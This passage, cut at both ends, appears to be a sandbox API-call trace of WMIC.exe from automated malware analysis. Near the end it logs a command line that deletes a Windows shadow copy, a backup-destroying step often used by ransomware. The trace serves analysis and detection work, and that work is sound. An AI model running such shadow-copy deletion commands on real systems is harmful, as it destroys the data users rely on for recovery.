(hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0103.626] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.626] FreeLibrary (hLibModule=0x77940000) returned 1 [0103.626] free (_Block=0x1569c0) [0103.626] _vsnwprintf (in: _Buffer=0x157f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x22f2c8 | out: _Buffer="ms_409") returned 6 [0103.626] malloc (_Size=0x20) returned 0x1569a0 [0103.627] GetComputerNameW (in: lpBuffer=0x1569a0, nSize=0x22f6a0 | out: lpBuffer="XDUWTFONO", nSize=0x22f6a0) returned 1 [0103.627] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.627] malloc (_Size=0x14) returned 0x3fdfb0 [0103.627] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.627] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x22f698 | out: lpNameBuffer=0x0, nSize=0x22f698) returned 0x7fffffdc000 [0103.628] GetLastError () returned 0xea [0103.628] malloc (_Size=0x40) returned 0x1569d0 [0103.628] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1569d0, nSize=0x22f698 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22f698) returned 0x1 [0103.628] lstrlenW (lpString="") returned 0 [0103.628] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0103.629] lstrlenW (lpString=".") returned 1 [0103.629] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.629] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0103.629] lstrlenW (lpString="LOCALHOST") returned 9 [0103.629] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.629] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0103.630] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.630] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0103.630] free (_Block=0x3fdfb0) [0103.630] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.630] malloc (_Size=0x14) returned 0x3fdfb0 [0103.630] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.630] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.630] malloc (_Size=0x14) returned 0x156a20 [0103.630] lstrlenW (lpString="XDUWTFONO") returned 9 [0103.630] malloc (_Size=0x8) returned 0x156a40 [0103.630] malloc (_Size=0x18) returned 0x156a60 [0103.630] malloc (_Size=0x30) returned 0x156a80 [0103.630] malloc (_Size=0x18) returned 0x156ac0 [0103.630] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.630] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.630] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.630] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.630] malloc (_Size=0x30) returned 0x156ae0 [0103.630] malloc (_Size=0x18) returned 0x156b20 [0103.630] SysStringLen (param_1="IMPERSONATE") returned 0xb [0103.631] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.631] SysStringLen (param_1="IMPERSONATE") returned 0xb [0103.631] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.631] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.631] SysStringLen (param_1="IMPERSONATE") returned 0xb [0103.631] malloc (_Size=0x30) returned 0x156b40 [0103.631] malloc (_Size=0x18) returned 0x156b80 [0103.631] SysStringLen (param_1="DELEGATE") returned 0x8 [0103.631] SysStringLen (param_1="IDENTIFY") returned 0x8 [0103.631] SysStringLen (param_1="DELEGATE") returned 0x8 [0103.631] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.631] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0103.631] SysStringLen (param_1="DELEGATE") returned 0x8 [0103.631] malloc (_Size=0x30) returned 0x156ba0 [0103.631] malloc (_Size=0x18) returned 0x156be0 [0103.631] malloc (_Size=0x30) returned 0x156c00 [0103.631] malloc (_Size=0x18) returned 0x156c40 [0103.631] SysStringLen (param_1="NONE") returned 0x4 [0103.631] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.631] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.631] SysStringLen (param_1="NONE") returned 0x4 [0103.631] malloc (_Size=0x30) returned 0x156c60 [0103.632] malloc (_Size=0x18) returned 0x156ca0 [0103.632] SysStringLen (param_1="CONNECT") returned 0x7 [0103.632] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.632] malloc (_Size=0x30) returned 0x156cc0 [0103.632] malloc (_Size=0x18) returned 0x156d00 [0103.632] SysStringLen (param_1="CALL") returned 0x4 [0103.632] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.632] SysStringLen (param_1="CALL") returned 0x4 [0103.632] SysStringLen (param_1="CONNECT") returned 0x7 [0103.632] malloc (_Size=0x30) returned 0x156d20 [0103.632] malloc (_Size=0x18) returned 0x156d60 [0103.632] SysStringLen (param_1="PKT") returned 0x3 [0103.632] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.632] SysStringLen (param_1="PKT") returned 0x3 [0103.632] SysStringLen (param_1="NONE") returned 0x4 [0103.632] SysStringLen (param_1="NONE") returned 0x4 [0103.632] SysStringLen (param_1="PKT") returned 0x3 [0103.632] malloc (_Size=0x30) returned 0x156d80 [0103.632] malloc (_Size=0x18) returned 0x156dc0 [0103.632] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.632] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.632] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.632] SysStringLen (param_1="NONE") returned 0x4 [0103.632] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.632] SysStringLen (param_1="PKT") returned 0x3 [0103.632] SysStringLen (param_1="PKT") returned 0x3 [0103.632] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.632] malloc (_Size=0x30) returned 0x158000 [0103.633] malloc (_Size=0x18) returned 0x156de0 [0103.633] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.633] SysStringLen (param_1="DEFAULT") returned 0x7 [0103.633] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.633] SysStringLen (param_1="PKT") returned 0x3 [0103.633] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.633] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.633] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0103.633] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0103.633] malloc (_Size=0x30) returned 0x158040 [0103.633] malloc (_Size=0x40) returned 0x156e00 [0103.634] malloc (_Size=0x20a) returned 0x156e50 [0103.634] GetSystemDirectoryW (in: lpBuffer=0x156e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.634] free (_Block=0x156e50) [0103.634] malloc (_Size=0x18) returned 0x156e50 [0103.634] malloc (_Size=0x18) returned 0x156e70 [0103.634] malloc (_Size=0x18) returned 0x156e90 [0103.634] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0103.634] SysStringLen (param_1="\\wbem\\") returned 0x6 [0103.634] free (_Block=0x156e50) [0103.634] free (_Block=0x156e70) [0103.634] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0103.634] free (_Block=0x156e90) [0103.634] malloc (_Size=0x18) returned 0x156e50 [0103.634] malloc (_Size=0x18) returned 0x156e70 [0103.634] malloc (_Size=0x18) returned 0x156e90 [0103.634] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0103.634] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0103.635] free (_Block=0x156e50) [0103.635] free (_Block=0x156e70) [0103.635] GetCurrentThreadId () returned 0xa0c [0103.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x22efa0 | out: phkResult=0x22efa0*=0xf8) returned 0x0 [0103.635] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x22eff0, lpcbData=0x22ef90*=0x400 | out: lpType=0x0, lpData=0x22eff0*=0x30, lpcbData=0x22ef90*=0x4) returned 0x0 [0103.635] _wcsicmp (_String1="0", _String2="1") returned -1 [0103.635] _wcsicmp (_String1="0", _String2="2") returned -2 [0103.635] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x22ef90*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x22ef90*=0x42) returned 0x0 [0103.635] malloc (_Size=0x86) returned 0x156eb0 [0103.635] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x156eb0, lpcbData=0x22ef90*=0x42 | out: lpType=0x0, lpData=0x156eb0*=0x25, lpcbData=0x22ef90*=0x42) returned 0x0 [0103.635] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0103.635] malloc (_Size=0x42) returned 0x156f40 [0103.635] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0103.635] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x22eff0, lpcbData=0x22ef90*=0x400 | out: lpType=0x0, lpData=0x22eff0*=0x36, lpcbData=0x22ef90*=0xc) returned 0x0 [0103.635] _wtol (_String="65536") returned 65536 [0103.635] free (_Block=0x156eb0) [0103.635] RegCloseKey (hKey=0x0) returned 0x6 [0103.635] CoCreateInstance (in: rclsid=0xff3c7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3c73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x22f498 | out: ppv=0x22f498*=0x1de71d0) returned 0x0 [0103.656] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1de71d0, xmlSource=0x22f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x156e50), isSuccessful=0x22f650 | out: isSuccessful=0x22f650*=0xffff) returned 0x0 [0103.779] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1de71d0, DOMElement=0x22f490 | out: DOMElement=0x22f490) returned 0x0 [0103.779] malloc (_Size=0x18) returned 0x156e50 [0103.780] free (_Block=0x156e50) [0103.780] malloc (_Size=0x18) returned 0x156e50 [0103.780] free (_Block=0x156e50) [0103.780] malloc (_Size=0x18) returned 0x156e50 [0103.780] malloc (_Size=0x18) returned 0x156e70 [0103.780] malloc (_Size=0x30) returned 0x158080 [0103.781] malloc (_Size=0x18) returned 0x156eb0 [0103.781] free (_Block=0x156eb0) [0103.781] malloc (_Size=0x18) returned 0x15c560 [0103.781] malloc (_Size=0x18) returned 0x15c580 [0103.781] SysStringLen (param_1="VALUE") returned 0x5 [0103.781] SysStringLen (param_1="TABLE") returned 0x5 [0103.781] SysStringLen (param_1="TABLE") returned 0x5 [0103.781] SysStringLen (param_1="VALUE") returned 0x5 [0103.781] malloc (_Size=0x30) returned 0x1580c0 [0103.781] malloc (_Size=0x18) returned 0x15c5a0 [0103.781] free (_Block=0x15c5a0) [0103.782] malloc (_Size=0x18) returned 0x15c5a0 [0103.782] malloc (_Size=0x18) returned 0x15c5c0 [0103.782] SysStringLen (param_1="LIST") returned 0x4 [0103.782] SysStringLen (param_1="TABLE") returned 0x5 [0103.782] malloc (_Size=0x30) returned 0x158100 [0103.782] malloc (_Size=0x18) returned 0x15c5e0 [0103.782] free (_Block=0x15c5e0) [0103.782] malloc (_Size=0x18) returned 0x15c5e0 [0103.782] malloc (_Size=0x18) returned 0x15c600 [0103.782] SysStringLen (param_1="RAWXML") returned 0x6 [0103.782] SysStringLen (param_1="TABLE") returned 0x5 [0103.782] SysStringLen (param_1="RAWXML") returned 0x6 [0103.782] SysStringLen (param_1="LIST") returned 0x4 [0103.783] SysStringLen (param_1="LIST") returned 0x4 [0103.783] SysStringLen (param_1="RAWXML") returned 0x6 [0103.783] malloc (_Size=0x30) returned 0x158140 [0103.783] malloc (_Size=0x18) returned 0x15c620 [0103.783] free (_Block=0x15c620) [0103.783] malloc (_Size=0x18) returned 0x15c620 [0103.783] malloc (_Size=0x18) returned 0x15c640 [0103.783] SysStringLen (param_1="HTABLE") returned 0x6 [0103.783] SysStringLen (param_1="TABLE") returned 0x5 [0103.783] SysStringLen (param_1="HTABLE") returned 0x6 [0103.783] SysStringLen (param_1="LIST") returned 0x4 [0103.783] malloc (_Size=0x30) returned 0x158180 [0103.784] malloc (_Size=0x18) returned 0x15c660 [0103.784] free (_Block=0x15c660) [0103.784] malloc (_Size=0x18) returned 0x15c660 [0103.784] malloc (_Size=0x18) returned 0x15c680 [0103.784] SysStringLen (param_1="HFORM") returned 0x5 [0103.784] SysStringLen (param_1="TABLE") returned 0x5 [0103.784] SysStringLen (param_1="HFORM") returned 0x5 [0103.784] SysStringLen (param_1="LIST") returned 0x4 [0103.784] SysStringLen (param_1="HFORM") returned 0x5 [0103.784] SysStringLen (param_1="HTABLE") returned 0x6 [0103.784] malloc (_Size=0x30) returned 0x1581c0 [0103.784] malloc (_Size=0x18) returned 0x15c6a0 [0103.785] free (_Block=0x15c6a0) [0103.785] malloc (_Size=0x18) returned 0x15c6a0 [0103.785] malloc (_Size=0x18) returned 0x15c6c0 [0103.785] SysStringLen (param_1="XML") returned 0x3 [0103.785] SysStringLen (param_1="TABLE") returned 0x5 [0103.785] SysStringLen (param_1="XML") returned 0x3 [0103.785] SysStringLen (param_1="VALUE") returned 0x5 [0103.785] SysStringLen (param_1="VALUE") returned 0x5 [0103.785] SysStringLen (param_1="XML") returned 0x3 [0103.785] malloc (_Size=0x30) returned 0x158200 [0103.785] malloc (_Size=0x18) returned 0x15c6e0 [0103.785] free (_Block=0x15c6e0) [0103.785] malloc (_Size=0x18) returned 0x15c6e0 [0103.785] malloc (_Size=0x18) returned 0x15c700 [0103.786] SysStringLen (param_1="MOF") returned 0x3 [0103.786] SysStringLen (param_1="TABLE") returned 0x5 [0103.786] SysStringLen (param_1="MOF") returned 0x3 [0103.786] SysStringLen (param_1="LIST") returned 0x4 [0103.786] SysStringLen (param_1="MOF") returned 0x3 [0103.786] SysStringLen (param_1="RAWXML") returned 0x6 [0103.786] SysStringLen (param_1="LIST") returned 0x4 [0103.786] SysStringLen (param_1="MOF") returned 0x3 [0103.786] malloc (_Size=0x30) returned 0x158240 [0103.786] malloc (_Size=0x18) returned 0x15c720 [0103.786] free (_Block=0x15c720) [0103.786] malloc (_Size=0x18) returned 0x15c720 [0103.786] malloc (_Size=0x18) returned 0x15c740 [0103.786] SysStringLen (param_1="CSV") returned 0x3 [0103.787] SysStringLen (param_1="TABLE") returned 0x5 [0103.787] SysStringLen (param_1="CSV") returned 0x3 [0103.787] SysStringLen (param_1="LIST") returned 0x4 [0103.787] SysStringLen (param_1="CSV") returned 0x3 [0103.787] SysStringLen (param_1="HTABLE") returned 0x6 [0103.787] SysStringLen (param_1="CSV") returned 0x3 [0103.787] SysStringLen (param_1="HFORM") returned 0x5 [0103.787] malloc (_Size=0x30) returned 0x158280 [0103.787] malloc (_Size=0x18) returned 0x15c760 [0103.787] free (_Block=0x15c760) [0103.788] malloc (_Size=0x18) returned 0x15c760 [0103.788] malloc (_Size=0x18) returned 0x15c780 [0103.788] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.788] SysStringLen (param_1="TABLE") returned 0x5 [0103.788] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.788] SysStringLen (param_1="VALUE") returned 0x5 [0103.788] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.788] SysStringLen (param_1="XML") returned 0x3 [0103.788] SysStringLen (param_1="XML") returned 0x3 [0103.788] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.788] malloc (_Size=0x30) returned 0x1582c0 [0103.788] malloc (_Size=0x18) returned 0x15c7a0 [0103.788] free (_Block=0x15c7a0) [0103.788] malloc (_Size=0x18) returned 0x15c7a0 [0103.788] malloc (_Size=0x18) returned 0x15c7c0 [0103.789] SysStringLen (param_1="texttablewsys") returned 0xd [0103.789] SysStringLen (param_1="TABLE") returned 0x5 [0103.789] SysStringLen (param_1="texttablewsys") returned 0xd [0103.789] SysStringLen (param_1="XML") returned 0x3 [0103.789] SysStringLen (param_1="texttablewsys") returned 0xd [0103.789] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.789] SysStringLen (param_1="XML") returned 0x3 [0103.789] SysStringLen (param_1="texttablewsys") returned 0xd [0103.789] malloc (_Size=0x30) returned 0x158300 [0103.789] malloc (_Size=0x18) returned 0x15c7e0 [0103.789] free (_Block=0x15c7e0) [0103.790] malloc (_Size=0x18) returned 0x15c7e0 [0103.790] malloc (_Size=0x18) returned 0x15c800 [0103.790] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.790] SysStringLen (param_1="TABLE") returned 0x5 [0103.790] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.790] SysStringLen (param_1="XML") returned 0x3 [0103.790] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.790] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.790] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.790] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.790] malloc (_Size=0x30) returned 0x158340 [0103.790] malloc (_Size=0x18) returned 0x15c820 [0103.791] free (_Block=0x15c820) [0103.791] malloc (_Size=0x18) returned 0x15c820 [0103.791] malloc (_Size=0x18) returned 0x15c840 [0103.791] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.791] SysStringLen (param_1="TABLE") returned 0x5 [0103.791] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.791] SysStringLen (param_1="XML") returned 0x3 [0103.791] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.791] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.791] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.791] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.791] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.791] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.791] malloc (_Size=0x30) returned 0x158380 [0103.792] malloc (_Size=0x18) returned 0x15c860 [0103.792] free (_Block=0x15c860) [0103.792] malloc (_Size=0x18) returned 0x15c860 [0103.792] malloc (_Size=0x18) returned 0x15c880 [0103.792] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.792] SysStringLen (param_1="TABLE") returned 0x5 [0103.792] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.792] SysStringLen (param_1="XML") returned 0x3 [0103.792] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.792] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.792] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.792] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.792] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.792] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.793] malloc (_Size=0x30) returned 0x1583c0 [0103.793] malloc (_Size=0x18) returned 0x15c8a0 [0103.793] free (_Block=0x15c8a0) [0103.793] malloc (_Size=0x18) returned 0x15c8a0 [0103.793] malloc (_Size=0x18) returned 0x15c8c0 [0103.793] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.793] SysStringLen (param_1="TABLE") returned 0x5 [0103.793] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.793] SysStringLen (param_1="XML") returned 0x3 [0103.793] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.793] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.793] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.793] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.793] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.793] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.793] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.794] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0103.794] malloc (_Size=0x30) returned 0x158400 [0103.794] malloc (_Size=0x18) returned 0x15c8e0 [0103.794] free (_Block=0x15c8e0) [0103.794] malloc (_Size=0x18) returned 0x15c8e0 [0103.794] malloc (_Size=0x18) returned 0x15c900 [0103.794] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.794] SysStringLen (param_1="TABLE") returned 0x5 [0103.794] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.794] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.794] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.794] SysStringLen (param_1="XML") returned 0x3 [0103.794] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.794] SysStringLen (param_1="texttablewsys") returned 0xd [0103.794] SysStringLen (param_1="XML") returned 0x3 [0103.794] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.795] malloc (_Size=0x30) returned 0x158440 [0103.795] malloc (_Size=0x18) returned 0x15c920 [0103.795] free (_Block=0x15c920) [0103.795] malloc (_Size=0x18) returned 0x15c920 [0103.795] malloc (_Size=0x18) returned 0x15c940 [0103.795] SysStringLen (param_1="htable-sortby") returned 0xd [0103.795] SysStringLen (param_1="TABLE") returned 0x5 [0103.795] SysStringLen (param_1="htable-sortby") returned 0xd [0103.795] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.795] SysStringLen (param_1="htable-sortby") returned 0xd [0103.795] SysStringLen (param_1="XML") returned 0x3 [0103.795] SysStringLen (param_1="htable-sortby") returned 0xd [0103.795] SysStringLen (param_1="texttablewsys") returned 0xd [0103.795] SysStringLen (param_1="htable-sortby") returned 0xd [0103.795] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0103.796] SysStringLen (param_1="XML") returned 0x3 [0103.796] SysStringLen (param_1="htable-sortby") returned 0xd [0103.796] malloc (_Size=0x30) returned 0x158480 [0103.796] malloc (_Size=0x18) returned 0x15c960 [0103.796] free (_Block=0x15c960) [0103.796] malloc (_Size=0x18) returned 0x15c960 [0103.796] malloc (_Size=0x18) returned 0x15c980 [0103.796] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.796] SysStringLen (param_1="TABLE") returned 0x5 [0103.796] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.796] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.796] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.797] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.797] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.797] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.797] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.797] malloc (_Size=0x30) returned 0x1584c0 [0103.797] malloc (_Size=0x18) returned 0x15c9a0 [0103.797] free (_Block=0x15c9a0) [0103.797] malloc (_Size=0x18) returned 0x15c9a0 [0103.797] malloc (_Size=0x18) returned 0x15c9c0 [0103.797] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.797] SysStringLen (param_1="TABLE") returned 0x5 [0103.797] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.798] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.798] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.798] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0103.798] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.798] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0103.798] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.798] SysStringLen (param_1="wmiclimofformat") returned 0xf [0103.798] malloc (_Size=0x30) returned 0x158500 [0103.798] malloc (_Size=0x18) returned 0x15c9e0 [0103.798] free (_Block=0x15c9e0) [0103.798] malloc (_Size=0x18) returned 0x15c9e0 [0103.798] malloc (_Size=0x18) returned 0x15ca00 [0103.798] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.798] SysStringLen (param_1="TABLE") returned 0x5 [0103.799] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.799] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.799] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.799] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.799] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.799] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.799] malloc (_Size=0x30) returned 0x158540 [0103.799] malloc (_Size=0x18) returned 0x15ca20 [0103.799] free (_Block=0x15ca20) [0103.799] malloc (_Size=0x18) returned 0x15ca20 [0103.799] malloc (_Size=0x18) returned 0x15ca40 [0103.799] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.799] SysStringLen (param_1="TABLE") returned 0x5 [0103.800] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.800] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.800] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.800] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0103.800] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.800] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.800] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.800] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0103.800] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0103.800] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0103.800] malloc (_Size=0x30) returned 0x158580 [0103.800] FreeThreadedDOMDocument:IUnknown:Release (This=0x1de71d0) returned 0x0 [0103.800] free (_Block=0x156e90) [0103.800] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete" [0103.801] malloc (_Size=0xe0) returned 0x15cd30 [0103.801] memcpy_s (in: _Destination=0x15cd30, _DestinationSize=0xde, _Source=0x2f25be, _SourceSize=0xd0 | out: _Destination=0x15cd30) returned 0x0 [0103.801] malloc (_Size=0x18) returned 0x15ca60 [0103.801] malloc (_Size=0x18) returned 0x15ca80 [0103.801] malloc (_Size=0x18) returned 0x15caa0 [0103.801] malloc (_Size=0x18) returned 0x15cac0 [0103.801] malloc (_Size=0x80) returned 0x156e90 [0103.801] GetLocalTime (in: lpSystemTime=0x22f630 | out: lpSystemTime=0x22f630*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x8, wMilliseconds=0x15b)) [0103.801] _vsnwprintf (in: _Buffer=0x156e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x22f588 | out: _Buffer="09-04-2020T08:55:08") returned 19 [0103.801] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.801] malloc (_Size=0x90) returned 0x1570a0 [0103.801] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.801] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.801] malloc (_Size=0x90) returned 0x15ce20 [0103.801] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.801] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.802] lstrlenW (lpString=" shadowcopy where \"ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'\" delete") returned 71 [0103.802] malloc (_Size=0x16) returned 0x15cae0 [0103.802] lstrlenW (lpString="shadowcopy") returned 10 [0103.802] _wcsicmp 